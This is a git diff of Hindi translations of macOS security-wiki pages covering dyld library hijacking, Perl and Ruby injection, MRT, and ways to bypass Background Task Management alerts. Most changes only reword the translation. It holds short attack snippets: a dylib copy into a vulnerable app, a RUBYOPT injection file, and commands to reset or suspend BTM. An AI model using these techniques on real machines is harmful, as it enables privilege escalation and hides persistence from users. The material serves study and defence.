> नोट: Apple प्लेटफार्मों पर "यूनिवर्सल" फ़ाइलों का उपयोग 32-बिट और 64-बिट लाइब्रेरी को संयोजित करने के लिए किया जाता है। इसका मतलब है कि **कोई अलग 32-बिट और 64-बिट खोज पथ नहीं हैं**
> नोट: Apple प्लेटफार्म "यूनिवर्सल" फ़ाइलों का उपयोग करते हैं ताकि 32-बिट और 64-बिट लाइब्रेरी को संयोजित किया जा सके। इसका मतलब है कि **कोई अलग 32-बिट और 64-बिट खोज पथ नहीं हैं**
>
> नोट: Apple प्लेटफार्मों पर अधिकांश OS dylibs **dyld कैश में संयोजित** होते हैं और डिस्क पर मौजूद नहीं होते हैं। इसलिए, यह पूर्व-फ्लाइट के लिए **`stat()`** को कॉल करना यदि एक OS dylib मौजूद है **काम नहीं करेगा**। हालाँकि, **`dlopen_preflight()`** एक संगत mach-o फ़ाइल खोजने के लिए **`dlopen()`** के समान चरणों का उपयोग करता है।
> नोट: Apple प्लेटफार्मों पर अधिकांश OS dylibs **dyld कैश में संयोजित** होते हैं और डिस्क पर मौजूद नहीं होते हैं। इसलिए, यदि एक OS dylib मौजूद है तो **`stat()`** को पूर्व-उड़ान करने के लिए **काम नहीं करेगा**। हालाँकि, **`dlopen_preflight()`** एक संगत mach-o फ़ाइल खोजने के लिए **`dlopen()`** के समान चरणों का उपयोग करता है।
**पथों की जांच करें**
@ -215,17 +215,17 @@ return 0;
```bash
sudo fs_usage | grep "dlopentest"
```
## सापेक्ष पथ हाइजैकिंग
## Relative Path Hijacking
यदि एक **विशिष्ट बाइनरी/ऐप** (जैसे SUID या कुछ बाइनरी जिसमें शक्तिशाली अधिकार हैं) एक **सापेक्ष पथ** लाइब्रेरी को **लोड कर रहा है** (उदाहरण के लिए `@executable_path` या `@loader_path` का उपयोग करके) और **लाइब्रेरी सत्यापन अक्षम** है, तो यह संभव हो सकता है कि बाइनरी को एक स्थान पर ले जाया जाए जहाँ हमलावर **सापेक्ष पथ लोड की गई लाइब्रेरी** को **संशोधित** कर सके, और इसे प्रक्रिया में कोड इंजेक्ट करने के लिए दुरुपयोग कर सके।
यदि एक **privileged binary/app** (जैसे SUID या कुछ बाइनरी जिसमें शक्तिशाली अधिकार हैं) एक **relative path** लाइब्रेरी को **लोड कर रहा है** (उदाहरण के लिए `@executable_path` या `@loader_path` का उपयोग करके) और **Library Validation अक्षम** है, तो यह संभव हो सकता है कि बाइनरी को एक स्थान पर ले जाया जाए जहाँ हमलावर **relative path लोड की गई लाइब्रेरी** को **संशोधित** कर सके, और इसे प्रक्रिया में कोड इंजेक्ट करने के लिए दुरुपयोग कर सके।
## `DYLD_*` और `LD_LIBRARY_PATH` पर्यावरण चर को छाँटें
## Prune `DYLD_*` और `LD_LIBRARY_PATH` env variables
फाइल `dyld-dyld-832.7.1/src/dyld2.cpp` में **`pruneEnvironmentVariables`** फ़ंक्शन पाया जा सकता है, जो किसी भी पर्यावरण चर को हटा देगा जो **`DYLD_`** से **शुरू होता है** और **`LD_LIBRARY_PATH=`**।
फाइल `dyld-dyld-832.7.1/src/dyld2.cpp` में **`pruneEnvironmentVariables`** फ़ंक्शन पाया जा सकता है, जो किसी भी env वेरिएबल को हटा देगा जो **`DYLD_`** और **`LD_LIBRARY_PATH=`** से **शुरू होता है**
यह विशेष रूप से **suid** और **sgid** बाइनरी के लिए पर्यावरण चर **`DYLD_FALLBACK_FRAMEWORK_PATH`** और **`DYLD_FALLBACK_LIBRARY_PATH`** को **null** पर सेट करेगा।
यह विशेष रूप से **suid** और **sgid** बाइनरी के लिए env वेरिएबल **`DYLD_FALLBACK_FRAMEWORK_PATH`** और **`DYLD_FALLBACK_LIBRARY_PATH`** को **null** पर सेट करेगा।
यह फ़ंक्शन उसी फ़ाइल के **`_main`** फ़ंक्शन से इस तरह से बुलाया जाता है यदि OSX को लक्षित किया गया हो:
यह फ़ंक्शन उसी फ़ाइल के **`_main`** फ़ंक्शन से इस तरह से कॉल किया जाता है यदि OSX को लक्षित किया गया हो:
```cpp
#if TARGET_OS_OSX
if ( !gLinkContext.allowEnvVarsPrint && !gLinkContext.allowEnvVarsPath && !gLinkContext.allowEnvVarsSharedCache ) {

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md
View File

@ -121,7 +121,7 @@ cmd LC_REEXPORT_DYLIB
cmdsize 128
name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24)
```
अंत में इसे **हाइजैक की गई स्थान** पर कॉपी करें:
अंत में इसे **हाइजैक की गई स्थान** पर बस कॉपी करें:
```bash
cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib"
```

10
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md
View File

@ -61,7 +61,7 @@ int main (int argc, char **argv, char **envp, char **apple)
printf("Hi\n");
}
```
दिलचस्प डिस्सेम्बली भाग:
दिलचस्प डिसअस्सेम्बली भाग:
```armasm
; objdump -d ./load
100003f7c: 90000000 adrp x0, 0x100003000 <_main+0x1c>
@ -253,12 +253,12 @@ dyld[21623]: running initializer 0x18e59e5c0 in /usr/lib/libSystem.B.dylib
```
### अन्य
- `DYLD_BIND_AT_LAUNCH`: लेज़ी बाइंडिंग को नॉन लेज़ी के साथ हल किया जाता है
- `DYLD_BIND_AT_LAUNCH`: Lazy bindings को non lazy के साथ हल किया जाता है
- `DYLD_DISABLE_PREFETCH`: \_\_DATA और \_\_LINKEDIT सामग्री की प्री-फेचिंग को निष्क्रिय करें
- `DYLD_FORCE_FLAT_NAMESPACE`: एकल-स्तरीय बाइंडिंग
- `DYLD_[FRAMEWORK/LIBRARY]_PATH | DYLD_FALLBACK_[FRAMEWORK/LIBRARY]_PATH | DYLD_VERSIONED_[FRAMEWORK/LIBRARY]_PATH`: समाधान पथ
- `DYLD_INSERT_LIBRARIES`: एक विशिष्ट पुस्तकालय लोड करें
- `DYLD_PRINT_TO_FILE`: एक फ़ाइल में dyld डिबग लिखें
- `DYLD_PRINT_TO_FILE`: dyld डिबग को एक फ़ाइल में लिखें
- `DYLD_PRINT_APIS`: libdyld API कॉल प्रिंट करें
- `DYLD_PRINT_APIS_APP`: मुख्य द्वारा किए गए libdyld API कॉल प्रिंट करें
- `DYLD_PRINT_BINDINGS`: बंधे होने पर प्रतीकों को प्रिंट करें
@ -271,13 +271,13 @@ dyld[21623]: running initializer 0x18e59e5c0 in /usr/lib/libSystem.B.dylib
- `DYLD_PRINT_OPTS`: लोड विकल्प प्रिंट करें
- `DYLD_REBASING`: प्रतीक रीबेसिंग संचालन प्रिंट करें
- `DYLD_RPATHS`: @rpath के विस्तार प्रिंट करें
- `DYLD_PRINT_SEGMENTS`: Mach-O खंडों के मानचित्रण प्रिंट करें
- `DYLD_PRINT_SEGMENTS`: Mach-O खंडों के मानचित्रण को प्रिंट करें
- `DYLD_PRINT_STATISTICS`: समय सांख्यिकी प्रिंट करें
- `DYLD_PRINT_STATISTICS_DETAILS`: विस्तृत समय सांख्यिकी प्रिंट करें
- `DYLD_PRINT_WARNINGS`: चेतावनी संदेश प्रिंट करें
- `DYLD_SHARED_CACHE_DIR`: साझा पुस्तकालय कैश के लिए उपयोग करने का पथ
- `DYLD_SHARED_REGION`: "उपयोग", "निजी", "बचें"
- `DYLD_USE_CLOSURES`: क्लोज़र सक्षम करें
- `DYLD_USE_CLOSURES`: क्लोज़र्स सक्षम करें
कुछ ऐसा करके और अधिक ढूंढना संभव है:
```bash

6
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
View File

@ -44,16 +44,16 @@ perl -e 'print join("\n", @INC)'
/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
/System/Library/Perl/Extras/5.30
```
कुछ लौटाए गए फ़ोल्डर वास्तव में मौजूद नहीं हैं, हालाँकि, **`/Library/Perl/5.30`** वास्तव में **मौजूद** है, यह **SIP** द्वारा **सुरक्षित** नहीं है और यह **SIP** द्वारा **सुरक्षित** फ़ोल्डरों से **पहले** है। इसलिए, कोई उस फ़ोल्डर का दुरुपयोग कर सकता है ताकि वहाँ स्क्रिप्ट निर्भरताएँ जोड़ी जा सकें ताकि एक उच्च विशेषाधिकार प्राप्त Perl स्क्रिप्ट इसे लोड कर सके।
कुछ लौटाए गए फ़ोल्डर वास्तव में मौजूद नहीं हैं, हालाँकि, **`/Library/Perl/5.30`** **मौजूद** है, यह **SIP** द्वारा **संरक्षित** **नहीं** है और यह **SIP** द्वारा **संरक्षित** फ़ोल्डरों से **पहले** है। इसलिए, कोई उस फ़ोल्डर का दुरुपयोग कर सकता है ताकि वहाँ स्क्रिप्ट निर्भरताएँ जोड़ी जा सकें ताकि एक उच्च विशेषाधिकार प्राप्त Perl स्क्रिप्ट इसे लोड कर सके।
> [!WARNING]
> हालाँकि, ध्यान दें कि आपको उस फ़ोल्डर में लिखने के लिए **रूट** होना **ज़रूरी** है और आजकल आपको यह **TCC प्रॉम्प्ट** मिलेगा:
<figure><img src="../../../images/image (28).png" alt="" width="244"><figcaption></figcaption></figure>
उदाहरण के लिए, यदि एक स्क्रिप्ट **`use File::Basename;`** आयात कर रही है, तो यह संभव होगा कि `/Library/Perl/5.30/File/Basename.pm` बनाया जाए ताकि यह मनमाना कोड निष्पादित कर सके।
उदाहरण के लिए, यदि एक स्क्रिप्ट **`use File::Basename;`** आयात कर रही है, तो `/Library/Perl/5.30/File/Basename.pm` बनाना संभव होगा ताकि यह मनमाना कोड निष्पादित कर सके।
## References
## संदर्भ
- [https://www.youtube.com/watch?v=zxZesAN-TEk](https://www.youtube.com/watch?v=zxZesAN-TEk)

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md
View File

@ -4,9 +4,9 @@
## RUBYOPT
इस env वेरिएबल का उपयोग करके **ruby** को निष्पादित करते समय **नए params** **जोड़ना** संभव है। हालांकि **`-e`** पैरामीटर का उपयोग ruby को निष्पादित करने के लिए कोड निर्दिष्ट करने के लिए नहीं किया जा सकता, लेकिन **`-I`** और **`-r`** पैरामीटर का उपयोग करके लोड पथ में एक नई फ़ोल्डर जोड़ना और फिर **लोड करने के लिए एक लाइब्रेरी निर्दिष्ट करना** संभव है।
इस env वेरिएबल का उपयोग करके **ruby** को निष्पादित करते समय **नए params** **जोड़ना** संभव है। हालांकि **`-e`** पैरामीटर का उपयोग ruby को निष्पादित करने के लिए कोड निर्दिष्ट करने के लिए नहीं किया जा सकता, लेकिन **`-I`** और **`-r`** पैरामीटर का उपयोग करके लोड पथ में एक नई फ़ोल्डर जोड़ना और फिर **लोड करने के लिए एक पुस्तकालय निर्दिष्ट करना** संभव है।
लाइब्रेरी **`inject.rb`** को **`/tmp`** में बनाएं:
पुस्तकालय **`inject.rb`** को **`/tmp`** में बनाएं:
```ruby:inject.rb
puts `whoami`
```

20
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
View File

@ -48,20 +48,20 @@ macos-launch-environment-constraints.md
## MRT - मैलवेयर हटाने का उपकरण
मैलवेयर हटाने का उपकरण (MRT) macOS की सुरक्षा अवसंरचना का एक और हिस्सा है। नाम से ही स्पष्ट है, MRT का मुख्य कार्य **संक्रमित सिस्टम से ज्ञात मैलवेयर को हटाना** है।
मैलवेयर हटाने का उपकरण (MRT) macOS की सुरक्षा अवसंरचना का एक और हिस्सा है। जैसा कि नाम से पता चलता है, MRT का मुख्य कार्य **संक्रमित सिस्टम से ज्ञात मैलवेयर को हटाना** है।
एक बार जब मैलवेयर Mac पर पता लगाया जाता है (या तो XProtect द्वारा या किसी अन्य तरीके से), MRT का उपयोग स्वचालित रूप से **मैलवेयर को हटाने** के लिए किया जा सकता है। MRT चुपचाप पृष्ठभूमि में काम करता है और आमतौर पर तब चलता है जब सिस्टम अपडेट होता है या जब एक नया मैलवेयर परिभाषा डाउनलोड किया जाता है (यह ऐसा लगता है कि मैलवेयर का पता लगाने के लिए MRT के पास जो नियम हैं वे बाइनरी के अंदर हैं)।
एक बार जब मैलवेयर Mac पर पता लगाया जाता है (या तो XProtect द्वारा या किसी अन्य तरीके से), MRT का उपयोग स्वचालित रूप से **मैलवेयर को हटाने** के लिए किया जा सकता है। MRT चुपचाप पृष्ठभूमि में काम करता है और आमतौर पर तब चलता है जब सिस्टम अपडेट होता है या जब एक नया मैलवेयर परिभाषा डाउनलोड किया जाता है (यह ऐसा लगता है कि मैलवेयर का पता लगाने के लिए MRT के पास नियम बाइनरी के अंदर हैं)।
हालांकि XProtect और MRT दोनों macOS के सुरक्षा उपायों का हिस्सा हैं, वे विभिन्न कार्य करते हैं:
- **XProtect** एक निवारक उपकरण है। यह **फाइलों की जांच करता है जब वे डाउनलोड होती हैं** (कुछ अनुप्रयोगों के माध्यम से), और यदि यह ज्ञात प्रकार के किसी भी मैलवेयर का पता लगाता है, तो यह **फाइल को खोलने से रोकता है**, इस प्रकार मैलवेयर को आपके सिस्टम को पहले स्थान पर संक्रमित करने से रोकता है।
- **MRT**, दूसरी ओर, एक **प्रतिक्रियाशील उपकरण** है। यह उस समय काम करता है जब सिस्टम पर मैलवेयर का पता लगाया गया हो, जिसका लक्ष्य offending सॉफ़्टवेयर को हटाकर सिस्टम को साफ करना है
- **XProtect** एक निवारक उपकरण है। यह **फाइलों की जांच करता है जब वे डाउनलोड होती हैं** (कुछ अनुप्रयोगों के माध्यम से), और यदि यह ज्ञात प्रकार के किसी भी मैलवेयर का पता लगाता है, तो यह **फाइल को खोलने से रोकता है**, इस प्रकार पहले स्थान पर मैलवेयर को आपके सिस्टम को संक्रमित करने से रोकता है।
- **MRT**, दूसरी ओर, एक **प्रतिक्रियाशील उपकरण** है। यह उस सिस्टम पर मैलवेयर का पता लगाने के बाद काम करता है, जिसका लक्ष्य offending सॉफ़्टवेयर को हटाना है ताकि सिस्टम को साफ किया जा सके
MRT एप्लिकेशन **`/Library/Apple/System/Library/CoreServices/MRT.app`** में स्थित है।
## पृष्ठभूमि कार्य प्रबंधन
**macOS** अब **हर बार अलर्ट करता है जब एक उपकरण एक ज्ञात **तकनीक का उपयोग करता है कोड निष्पादन को बनाए रखने के लिए** (जैसे लॉगिन आइटम, डेमन...), ताकि उपयोगकर्ता बेहतर जान सके **कौन सा सॉफ़्टवेयर बनाए रखा जा रहा है**।
**macOS** अब **हर बार अलर्ट करता है जब एक उपकरण एक अच्छी तरह से ज्ञात **तकनीक का उपयोग करता है कोड निष्पादन को बनाए रखने के लिए** (जैसे लॉगिन आइटम, डेमन...), ताकि उपयोगकर्ता बेहतर जान सके **कौन सा सॉफ़्टवेयर बना हुआ है**।
<figure><img src="../../../images/image (1183).png" alt=""><figcaption></figcaption></figure>
@ -69,7 +69,7 @@ MRT एप्लिकेशन **`/Library/Apple/System/Library/CoreServices/MR
जिस तरह से **`backgroundtaskmanagementd`** जानता है कि कुछ स्थायी फ़ोल्डर में स्थापित है वह **FSEvents प्राप्त करके** और उनके लिए कुछ **हैंडलर्स** बनाकर है।
इसके अलावा, एक plist फ़ाइल है जिसमें **ज्ञात अनुप्रयोगों** की सूची है जो अक्सर बनाए रखी जाती है, जो एप्पल द्वारा `/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/attributions.plist` में स्थित है।
इसके अलावा, एक plist फ़ाइल है जिसमें **अच्छी तरह से ज्ञात अनुप्रयोगों** की सूची है जो अक्सर बनाए रखी जाती है, जो एप्पल द्वारा `/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/attributions.plist` में स्थित है।
```json
[...]
"us.zoom.ZoomDaemon" => {
@ -87,7 +87,7 @@ MRT एप्लिकेशन **`/Library/Apple/System/Library/CoreServices/MR
```
### Enumeration
यह संभव है कि **सभी** कॉन्फ़िगर किए गए बैकग्राउंड आइटम्स को एप्पल CLI टूल का उपयोग करके सूचीबद्ध किया जा सके:
यह संभव है कि **सभी** कॉन्फ़िगर किए गए बैकग्राउंड आइटम्स को एप्पल CLI टूल का उपयोग करके सूचीबद्ध किया जा:
```bash
# The tool will always ask for the users password
sfltool dumpbtm
@ -103,9 +103,9 @@ xattr -rc dumpBTM # Remove quarantine attr
### BTM के साथ छेड़छाड़
जब एक नई स्थिरता पाई जाती है, तो एक प्रकार की घटना **`ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD`** होती है। इसलिए, किसी भी तरीके से इस **घटना** को भेजने से रोकना या **एजेंट को उपयोगकर्ता को चेतावनी देने से रोकना** एक हमलावर को BTM को _**बायपास**_ करने में मदद करेगा
जब एक नई स्थिरता पाई जाती है, तो एक प्रकार की घटना **`ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD`** होती है। इसलिए, इस **घटना** को भेजने से रोकने या **एजेंट द्वारा उपयोगकर्ता को चेतावनी देने** से किसी हमलावर को BTM को _**बायपास**_ करने में मदद मिलेगी
- **डेटाबेस को रीसेट करना**: निम्नलिखित कमांड चलाने से डेटाबेस रीसेट हो जाएगा (इसे जमीन से फिर से बनाना चाहिए), हालाँकि, किसी कारणवश, इसे चलाने के बाद, **कोई नई स्थिरता तब तक चेतावनी नहीं दी जाएगी जब तक कि सिस्टम को पुन चालू नहीं किया जाता**।
- **डेटाबेस को रीसेट करना**: निम्नलिखित कमांड चलाने से डेटाबेस रीसेट हो जाएगा (इसे जमीन से फिर से बनाना चाहिए), हालाँकि, किसी कारणवश, इसे चलाने के बाद, **कोई नई स्थिरता तब तक चेतावनी नहीं दी जाएगी जब तक कि सिस्टम को पुनरारंभ नहीं किया जाता**।
- **root** की आवश्यकता है।
```bash
# Reset the database
@ -124,7 +124,7 @@ kill -SIGSTOP 1011
ps -o state 1011
T
```
- **बग**: यदि **स्थायीता बनाने वाली प्रक्रिया तुरंत उसके बाद मौजूद है**, तो डेमन **इसके बारे में जानकारी प्राप्त करने** की कोशिश करेगा, **असफल** होगा, और **घटना भेजने में असमर्थ होगा** जो यह संकेत देती है कि एक नई चीज स्थायी हो रही है
- **बग**: यदि **स्थायीता बनाने वाली प्रक्रिया तुरंत उसके बाद मौजूद है**, तो डेमन **इसके बारे में जानकारी प्राप्त करने** की कोशिश करेगा, **असफल** होगा, और **नए चीज के स्थायी होने** का संकेत देने वाला इवेंट भेजने में **असमर्थ** होगा
संदर्भ और **BTM के बारे में अधिक जानकारी**:

22
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md
View File

@ -20,7 +20,7 @@ AMFI **MACF** नीतियों का उपयोग करता है
- **`cred_check_label_update_execve:`** लेबल अपडेट किया जाएगा और 1 लौटाएगा
- **`cred_label_associate`**: AMFI के मैक लेबल स्लॉट को लेबल के साथ अपडेट करें
- **`cred_label_destroy`**: AMFI के मैक लेबल स्लॉट को हटा दें
- **`cred_label_destroy`**: AMFI का मैक लेबल स्लॉट हटा दें
- **`cred_label_init`**: AMFI के मैक लेबल स्लॉट में 0 डालें
- **`cred_label_update_execve`:** यह प्रक्रिया के अधिकारों की जांच करता है कि क्या इसे लेबल को संशोधित करने की अनुमति दी जानी चाहिए।
- **`file_check_mmap`:** यह जांचता है कि क्या mmap मेमोरी प्राप्त कर रहा है और इसे निष्पादन योग्य के रूप में सेट कर रहा है। इस मामले में यह जांचता है कि क्या पुस्तकालय सत्यापन की आवश्यकता है और यदि हां, तो यह पुस्तकालय सत्यापन फ़ंक्शन को कॉल करता है।
@ -32,12 +32,12 @@ AMFI **MACF** नीतियों का उपयोग करता है
- **`amfi_exc_action_check_exception_send`**: एक अपवाद संदेश डिबगर को भेजा जाता है
- **`amfi_exc_action_label_associate & amfi_exc_action_label_copy/populate & amfi_exc_action_label_destroy & amfi_exc_action_label_init & amfi_exc_action_label_update`**: अपवाद हैंडलिंग (डिबगिंग) के दौरान लेबल जीवनचक्र
- **`proc_check_get_task`**: अधिकारों की जांच करता है जैसे `get-task-allow` जो अन्य प्रक्रियाओं को कार्य पोर्ट प्राप्त करने की अनुमति देता है और `task_for_pid-allow`, जो प्रक्रिया को अन्य प्रक्रियाओं के कार्य पोर्ट प्राप्त करने की अनुमति देता है। यदि इनमें से कोई भी नहीं है, तो यह `amfid permitunrestricteddebugging` को कॉल करता है यह जांचने के लिए कि क्या इसकी अनुमति है।
- **`proc_check_mprotect`**: यदि `mprotect` को `VM_PROT_TRUSTED` ध्वज के साथ कॉल किया जाता है, तो अस्वीकार करें जो इंगित करता है कि क्षेत्र को इस तरह से व्यवहार किया जाना चाहिए जैसे कि इसमें एक मान्य कोड सिग्नेचर है।
- **`vnode_check_exec`**: जब निष्पादन योग्य फ़ाइलें मेमोरी में लोड होती हैं तो इसे कॉल किया जाता है और `cs_hard | cs_kill` सेट करता है जो प्रक्रिया को मार देगा यदि किसी भी पृष्ठ अमान्य हो जाता है
- **`proc_check_mprotect`**: यदि `mprotect` को `VM_PROT_TRUSTED` ध्वज के साथ कॉल किया जाता है, तो अस्वीकार करें जो इंगित करता है कि क्षेत्र को इस तरह से व्यवहार किया जाना चाहिए जैसे कि इसका एक मान्य कोड सिग्नेचर है।
- **`vnode_check_exec`**: जब निष्पादन योग्य फ़ाइलें मेमोरी में लोड होती हैं तो इसे कॉल किया जाता है और `cs_hard | cs_kill` सेट करता है जो प्रक्रिया को मार देगा यदि कोई भी पृष्ठ अमान्य हो जाता है
- **`vnode_check_getextattr`**: MacOS: `com.apple.root.installed` और `isVnodeQuarantined()` की जांच करें
- **`vnode_check_setextattr`**: जैसे प्राप्त + com.apple.private.allow-bless और आंतरिक-इंस्टॉलर-समान अधिकार
- &#x20;**`vnode_check_signature`**: कोड जो अधिकारों, ट्रस्ट कैश और `amfid` का उपयोग करके कोड सिग्नेचर की जांच करने के लिए XNU को कॉल करता है
- &#x20;**`proc_check_run_cs_invalid`**: यह `ptrace()` कॉल्स (`PT_ATTACH` और `PT_TRACE_ME`) को इंटरसेप्ट करता है। यह किसी भी अधिकारों की जांच करता है `get-task-allow`, `run-invalid-allow` और `run-unsigned-code` और यदि इनमें से कोई नहीं है, तो यह जांचता है कि क्या डिबगिंग की अनुमति है।
- **`vnode_check_setextattr`**: जैसे प्राप्त करें + com.apple.private.allow-bless और आंतरिक-इंस्टॉलर-समान अधिकार
- &#x20;**`vnode_check_signature`**: कोड जो XNU को अधिकारों, ट्रस्ट कैश और `amfid` का उपयोग करके कोड सिग्नेचर की जांच करने के लिए कॉल करता है
- &#x20;**`proc_check_run_cs_invalid`**: यह `ptrace()` कॉल ( `PT_ATTACH` और `PT_TRACE_ME`) को इंटरसेप्ट करता है। यह किसी भी अधिकारों की जांच करता है `get-task-allow`, `run-invalid-allow` और `run-unsigned-code` और यदि कोई नहीं है, तो यह जांचता है कि क्या डिबगिंग की अनुमति है।
- **`proc_check_map_anon`**: यदि mmap को **`MAP_JIT`** ध्वज के साथ कॉल किया जाता है, तो AMFI `dynamic-codesigning` अधिकार की जांच करेगा।
`AMFI.kext` अन्य कर्नेल एक्सटेंशन के लिए एक API भी उजागर करता है, और इसके निर्भरताओं को खोजने के लिए यह संभव है:
@ -66,17 +66,17 @@ No variant specified, falling back to release
## amfid
यह उपयोगकर्ता मोड चलाने वाला डेमन है जो `AMFI.kext` को उपयोगकर्ता मोड में कोड हस्ताक्षरों की जांच करने के लिए उपयोग करेगा।\
`AMFI.kext` डेमन के साथ संवाद करने के लिए `HOST_AMFID_PORT` पर मच संदेशों का उपयोग करता है, जो विशेष पोर्ट `18` है।
`AMFI.kext` डेमन के साथ संवाद करने के लिए `HOST_AMFID_PORT`ोर्ट पर मच संदेशों का उपयोग करता है, जो विशेष पोर्ट `18` है।
ध्यान दें कि macOS में अब रूट प्रक्रियाओं के लिए विशेष पोर्ट को हाईजैक करना संभव नहीं है क्योंकि उन्हें `SIP` द्वारा सुरक्षित किया गया है और केवल launchd उन्हें प्राप्त कर सकता है। iOS में यह जांचा जाता है कि प्रतिक्रिया वापस भेजने वाली प्रक्रिया में `amfid` का CDHash हार्डकोडेड है।
जब `amfid` को एक बाइनरी की जांच करने के लिए अनुरोध किया जाता है और इसका उत्तर प्राप्त होता है, तो इसे डिबग करके और `mach_msg` में एक ब्रेकपॉइंट सेट करके देखा जा सकता है।
एक बार जब विशेष पोर्ट के माध्यम से एक संदेश प्राप्त होता है, तो **MIG** का उपयोग प्रत्येक फ़ंक्शन को उस फ़ंक्शन को भेजने के लिए किया जाता है जिसे यह कॉल कर रहा है। मुख्य फ़ंक्शंस को उलट दिया गया था और पुस्तक के अंदर समझाया गया था।
एक बार जब विशेष पोर्ट के माध्यम से एक संदेश प्राप्त होता है, तो **MIG** का उपयोग प्रत्येक फ़ंक्शन को उस फ़ंक्शन को भेजने के लिए किया जाता है जिसे यह कॉल कर रहा है। मुख्य फ़ंक्शंस को उलटा किया गया और पुस्तक के अंदर समझाया गया।
## Provisioning Profiles
एक प्रोविजनिंग प्रोफ़ाइल को कोड पर हस्ताक्षर करने के लिए उपयोग किया जा सकता है। **Developer** प्रोफाइल हैं जिन्हें कोड पर हस्ताक्षर करने और परीक्षण करने के लिए उपयोग किया जा सकता है, और **Enterprise** प्रोफाइल हैं जिन्हें सभी उपकरणों में उपयोग किया जा सकता है
एक प्रोविजनिंग प्रोफ़ाइल का उपय कोड पर हस्ताक्षर करने के लिए किया जा सकता है। **डेवलपर** प्रोफाइल हैं जो कोड पर हस्ताक्षर करने और इसे परीक्षण करने के लिए उपयोग किए जा सकते हैं, और **एंटरप्राइज** प्रोफाइल हैं जो सभी उपकरणों में उपयोग किए जा सकते हैं
एक ऐप को Apple Store में सबमिट करने के बाद, यदि स्वीकृत होता है, तो इसे Apple द्वारा हस्ताक्षरित किया जाता है और प्रोविजनिंग प्रोफ़ाइल की अब आवश्यकता नहीं होती है।
@ -98,9 +98,9 @@ security cms -D -i /path/to/profile
- **Entitlements**: इस प्रोफाइल के लिए अनुमत अधिकार
- **ExpirationDate**: `YYYY-MM-DDTHH:mm:ssZ` प्रारूप में समाप्ति तिथि
- **Name**: एप्लिकेशन का नाम, जो AppIDName के समान है
- **ProvisionedDevices**: UDIDs क एक सरणी (डेवलपर प्रमाणपत्रों के लिए) जिसके लिए यह प्रोफाइल मान्य है
- **ProvisionedDevices**: UDIDs क एक सरणी (डेवलपर प्रमाणपत्रों के लिए) जिसके लिए यह प्रोफाइल मान्य है
- **ProvisionsAllDevices**: एक बूलियन (एंटरप्राइज प्रमाणपत्रों के लिए सत्य)
- **TeamIdentifier**: (आमतौर पर एक) अल्फ़ान्यूमेरिक स्ट्रिंग(s) क एक सरणी जिसका उपयोग इंटर-ऐप इंटरैक्शन उद्देश्यों के लिए डेवलपर की पहचान करने के लिए किया जाता है
- **TeamIdentifier**: (आमतौर पर एक) अल्फ़ान्यूमेरिक स्ट्रिंग(s) क एक सरणी जिसका उपयोग इंटर-ऐप इंटरैक्शन उद्देश्यों के लिए डेवलपर की पहचान करने के लिए किया जाता है
- **TeamName**: डेवलपर की पहचान करने के लिए उपयोग किया जाने वाला मानव-पठनीय नाम
- **TimeToLive**: प्रमाणपत्र की वैधता (दिनों में)
- **UUID**: इस प्रोफाइल के लिए एक यूनिवर्सली यूनिक आइडेंटिफायर

10
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.md
View File

@ -4,21 +4,21 @@
## **Athorizarions DB**
डेटाबेस `/var/db/auth.db` में स्थित है, जो संवेदनशील संचालन करने के लिए अनुमतियों को संग्रहीत करने के लिए उपयोग किया जाता है। ये संचालन पूरी तरह से **उपयोगकर्ता स्थान** में किए जाते हैं और आमतौर पर **XPC सेवाओं** द्वारा उपयोग किए जाते हैं जिन्हें यह जांचने की आवश्यकता होती है कि **क्या कॉलिंग क्लाइंट को विशेष क्रिया करने के लिए अधिकृत किया गया है** इस डेटाबेस की जांच करके।
डेटाबेस `/var/db/auth.db` में स्थित है, जो संवेदनशील ऑपरेशनों को करने के लिए अनुमतियों को स्टोर करने के लिए उपयोग किया जाता है। ये ऑपरेशन पूरी तरह से **उपयोगकर्ता स्थान** में किए जाते हैं और आमतौर पर **XPC सेवाओं** द्वारा उपयोग किए जाते हैं जिन्हें यह जांचने की आवश्यकता होती है कि **क्या कॉलिंग क्लाइंट को विशेष क्रिया करने के लिए अधिकृत किया गया है** इस डेटाबेस की जांच करके।
शुरुआत में, यह डेटाबेस `/System/Library/Security/authorization.plist` की सामग्री से बनाया जाता है। फिर, कुछ सेवाएँ इस डेटाबेस में अन्य अनुमतियाँ जोड़ने या संशोधित करने के लिए इसे जोड़ सकती हैं।
नियम `rules` तालिका में संग्रहीत होते हैं और निम्नलिखित कॉलम होते हैं:
नियम डेटाबेस के अंदर `rules` तालिका में संग्रहीत होते हैं और निम्नलिखित कॉलम होते हैं:
- **id**: प्रत्येक नियम के लिए एक अद्वितीय पहचानकर्ता, स्वचालित रूप से बढ़ता है और प्राथमिक कुंजी के रूप में कार्य करता है।
- **name**: नियम का अद्वितीय नाम जिसका उपयोग इसे पहचानने और अधिकृत प्रणाली के भीतर संदर्भित करने के लिए किया जाता है।
- **type**: नियम के प्रकार को निर्दिष्ट करता है, इसके अधिकृत तर्क को परिभाषित करने के लिए 1 या 2 के मानों तक सीमित है।
- **class**: नियम को एक विशिष्ट वर्ग में वर्गीकृत करता है, यह सुनिश्चित करते हुए कि यह एक सकारात्मक पूर्णांक है।
